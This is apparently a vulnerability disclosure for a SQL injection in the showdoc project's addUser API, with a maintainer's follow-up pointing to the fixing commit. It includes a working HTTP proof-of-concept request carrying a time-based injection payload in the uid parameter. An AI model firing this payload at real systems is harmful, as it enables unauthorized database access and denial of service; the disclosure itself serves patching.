SQL Injection in star7th/showdoc
Jan 25th 2022
uid parameter does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection.
Proof of Concept
POST /server/index.php?s=/api/adminUser/addUser HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: application/json, text/plain, */* Cookie: PHPSESSID=c35a50119eee7d09650616215ccc2693; think_language=en-US; cookie_token=248df88efcc25f6b5aef3ad5cf4fd2c145be19155add1c78609427a37f88d267 Accept-Encoding: gzip,deflate Content-Length: 106 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 Host: host.com Connection: Keep-alive name=laladee&uid=10'+and+1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))+and+'1'='1&username=laladee
A successful attack may result the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, write file to server lead to Remote code Execute, or write script to extract data
I've fixed it. You can check it https://github.com/star7th/showdoc/commit/2b34e267e4186125f99bfa420140634ad45801fb
Yes, I've submitted a patch above :) however the Issue has been resolved.
I found that there was a patch, but I didn't notice it. I fixed all the problems that others fed back before, so I habitually didn't see the patch. Pay attention next time